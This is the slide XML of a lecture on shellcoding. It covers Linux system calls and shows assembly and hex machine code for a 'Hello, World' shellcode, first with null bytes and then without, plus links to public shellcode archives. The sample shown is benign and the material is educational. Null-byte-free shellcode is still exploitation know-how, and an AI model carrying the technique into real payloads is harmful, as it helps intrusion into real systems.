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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="364" r:id="rId2"/>
    <p:sldId id="371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415" r:id="rId45"/>
    <p:sldId id="416" r:id="rId46"/>
    <p:sldId id="417" r:id="rId47"/>
    <p:sldId id="418" r:id="rId48"/>
    <p:sldId id="419" r:id="rId49"/>
    <p:sldId id="420" r:id="rId5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63"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="117" d="100"/>
          <a:sy n="117" d="100"/>
        </p:scale>
        <p:origin x="124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E4785-6A1D-3047-B4BE-5DC7305A466F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21D93-1425-6145-82C3-3D0C957E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71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64D8-0583-8248-9AF8-2792D24E0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10D28-95EE-7841-B8EC-0D9BD58F6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C3C3B-88D3-7A48-9ED2-575CD419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C5C74-CDB9-EF4F-850B-2689EC92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MY" smtClean="0"/>
              <a:pPr marL="25400">
                <a:lnSpc>
                  <a:spcPts val="1240"/>
                </a:lnSpc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441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0ACE-78BA-FF40-853A-9AA45B65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D569F-D6EA-4246-B44C-B3BE79162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123B5-EF65-0847-8B3D-47784C1C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3D8A-1A0E-A74A-A364-5C305AC0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5699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CE4CB-231B-D04A-ADF9-CD2177083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E99CD-979C-0A40-A50B-D9B11419A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56454-29ED-0942-BF1C-4F10617E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81777-D0D8-7949-A60A-7B052565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87617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lang="en-GB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095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D523D-3753-0347-8AC0-977184B4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1B2CBB-4755-5941-9B06-70BAC923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4F2AD66-4608-A646-96D3-871F7C91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lang="en-MY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CCCC84-39A3-1B45-9175-EFD13AB1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MY" smtClean="0"/>
              <a:pPr marL="25400">
                <a:lnSpc>
                  <a:spcPts val="1240"/>
                </a:lnSpc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3840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DDC6-9814-8D4B-ADBE-D3E2A377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C8CAC-F7C2-6843-90BB-3151C976D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62F6A-D7C1-6941-90DC-3A20F648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25F99-6C89-194F-A205-B079F4D4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8603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3753-AC9D-EE4D-BD0D-28A715FE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CECB-4DF4-6940-9CC1-0F7ED268D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CC6CE-F75A-1243-9212-E8432B487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6FE73-2923-1042-BF98-73E86440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8FC71-E273-1649-9671-F87B23C9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2696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775F-7A77-A941-BCDB-4AD9D356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7F538-1747-4643-A76F-F1BF4B09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A08E5-1EA6-C643-AC70-9235113BB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3CF4A-D8C9-C248-89C7-413B8CA18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B0563-DA76-AD4D-AE57-462695292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10467-CB57-A84D-A1E8-AE1B9C8E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F10B8-D1C6-2544-85B8-D8429611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331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163F-B555-2D43-B543-CDAF7477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D6D66-4023-DE47-8892-03DB7B03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611B5-60C9-6C4E-B869-F7760064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9727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DD403-030E-1244-BC3B-094A9BC7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9FFAE-DE4C-5D46-9150-D9FD0F67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3707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1694-58A0-A14B-96B1-8596F9EF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61B5-FAA5-854F-93E0-6154A08B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B54BD-BAA3-994C-9FE2-69A50BE70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8B092-601F-6049-BA6B-65A98BE1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4D498-6B6D-FE49-813E-89400F75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0293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0088-EC06-1C44-AB88-4FB51875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56894-D9E8-FB49-B5A3-322D6A556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9B7B9-17FC-314F-AA09-D0545B496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0951E-0C22-6B47-A78D-E2520A47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C6CA9-0EA7-744F-8790-88795C31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0186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73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8D474-6B8E-8541-A6E8-5F4F16C2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2589B-6E08-864A-83B8-71CA9A8A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4BB9-EBFD-B346-A7A6-1E516CB9B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59C95-F4BF-DB4A-BE50-49EBE07BB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MY" smtClean="0"/>
              <a:pPr marL="25400">
                <a:lnSpc>
                  <a:spcPts val="1240"/>
                </a:lnSpc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0760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s.up.ac.za/programming/asm/derick_tut/syscall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hell_(computing)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fuse.ca/online-x86-assembler.ht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shell-storm.org/shellcode/files/shellcode-811.ph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ploit-db.com/shellcode/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://shell-storm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9991" y="12954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25399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1800" y="289135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Shellcoding</a:t>
            </a:r>
            <a:endParaRPr sz="480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0EC66BA9-0619-40AB-AF31-164A8A391734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="680991" y="1933194"/>
            <a:ext cx="3886200" cy="276606"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27905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613936-5595-9448-B6DB-6F9A31B95F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1768222"/>
            <a:ext cx="4572000" cy="28146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0225" indent="-518159">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="530225" algn="l"/>
                <a:tab pos="530860" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Defining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="530225" indent="-518159">
              <a:lnSpc>
                <a:spcPct val="15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lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2000" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="530225" indent="-518159">
              <a:lnSpc>
                <a:spcPct val="15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lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Linux System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Calls</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2000" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="530225" indent="-518159">
              <a:lnSpc>
                <a:spcPct val="15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lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Writing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2000" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="530225" indent="-518159">
              <a:lnSpc>
                <a:spcPct val="15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lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Shellcode in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY" sz="2000" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="530225" indent="-518159">
              <a:lnSpc>
                <a:spcPct val="15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lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Additional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-MY" sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Notes</a:t>
            </a:r>
            <a:endParaRPr lang="en-MY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472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65424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Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>World with </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Bytes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27225" y="2115021"/>
            <a:ext cx="806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message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7196" y="2610320"/>
            <a:ext cx="918844" cy="27457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eax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eax  ebx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ebx  edx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edx  eax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4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="116205">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pP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ebx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1 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ecx  edx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13  0x80</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas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eax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1 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ebx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ebx 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0x80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110" y="1867371"/>
            <a:ext cx="1586230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user_code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12700" marR="337820" indent="893444">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp  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write_str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906144" marR="337820" algn="just">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xor  xor  xor  mov  mov  pop  mov  int  mov  xor  int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message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FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90487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.ascii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7196" y="5582114"/>
            <a:ext cx="180975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41275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write_str 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"Hello,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-9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World\n"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4764" y="5208374"/>
            <a:ext cx="4839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https://defuse.ca/online-x86-assembler.htm#disassembly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21789" y="1936202"/>
            <a:ext cx="3222625" cy="279400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2790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09089" y="1866352"/>
            <a:ext cx="3241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Machine code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string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constant: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9089" y="2277955"/>
            <a:ext cx="3249295" cy="15305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solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xEB\x21\x31\xC0\x31\xDB\x31\xD2</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xB8\x0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x00\x00\x0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xBB\x0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x00</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCCFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5715" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x00\x0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x59\xBA\x0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x00\x00\x00</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCCFF"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xCD\x80\xB8\x0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x00\x00\x0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCCFF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9BBA58"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x31</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\xDB\xCD\x80\xE8\xDA\xFF\xFF\xFF</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x48\x65\x6C\x6C\x6F\x2C\x20\x57</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="109855">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\x6F\x72\x6C\x64\x0A"</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill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16428" y="3952323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53</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="180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Bytes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28112" y="3228912"/>
            <a:ext cx="1626235" cy="232410"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1626235" h="232410">
                <a:moveTo>
                  <a:pt x="1625642" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="232234"/>
                </a:lnTo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3006" y="3420472"/>
            <a:ext cx="109081" cy="81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0430" y="3256511"/>
            <a:ext cx="1683385" cy="453390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1683385" h="453389">
                <a:moveTo>
                  <a:pt x="1683324" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="453278"/>
                </a:lnTo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77428" y="3669882"/>
            <a:ext cx="110708" cy="79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83604" y="3284111"/>
            <a:ext cx="1570355" cy="882650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1570354" h="882650">
                <a:moveTo>
                  <a:pt x="1570150" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="882398"/>
                </a:lnTo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98714" y="4129554"/>
            <a:ext cx="109830" cy="88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62683" y="3242711"/>
            <a:ext cx="1732914" cy="1391285"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1732914" h="1391285">
                <a:moveTo>
                  <a:pt x="1732471" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1391227"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="1904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85751" y="4599880"/>
            <a:ext cx="106158" cy="977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2E2FB31D-67AA-497B-A5FA-F70ECC5252EE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73502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7315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Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>World without </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Bytes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27225" y="2115021"/>
            <a:ext cx="806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message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138" y="1867371"/>
            <a:ext cx="1253490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user_code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12700" marR="5080" indent="893444">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp  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write_str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906144" marR="5080" algn="just">
              <a:lnSpc>
                <a:spcPct val="101600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xor  xor  xor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7215" y="2610320"/>
            <a:ext cx="918844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eax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eax  ebx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ebx  edx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edx</a:t>
            </a:r>
            <a:endParaRPr sz="16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14617" y="3418256"/>
          <a:ext cx="1627504" cy="1193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422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mov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510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al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1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948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mov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31750" marR="271780">
                        <a:lnSpc>
                          <a:spcPct val="101600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pop  mov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bl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279400" marR="103505">
                        <a:lnSpc>
                          <a:spcPct val="101600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ecx  d</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600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l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8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2">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="31750">
                        <a:lnSpc>
                          <a:spcPts val="167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675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0x80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427196" y="4591516"/>
            <a:ext cx="918844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al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1 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ebx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ebx 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0x80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110" y="4591516"/>
            <a:ext cx="1586230" cy="1507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906144" marR="337820" algn="just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FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mov  xor  int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message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FF9900"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90487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.ascii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7196" y="5582114"/>
            <a:ext cx="180975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41275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write_str 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"Hello,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-9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World\n"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21789" y="1936202"/>
            <a:ext cx="3222625" cy="279400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3222625" h="279400">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3222386" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3222386" y="279053"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2790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29200" y="1937326"/>
            <a:ext cx="3241040" cy="2724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Machine code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string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constant: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09089" y="2277955"/>
            <a:ext cx="3246755" cy="131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solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"\xEB\x15\x31\xC0\x31\xDB\x31\xD2</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="5080" algn="r">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
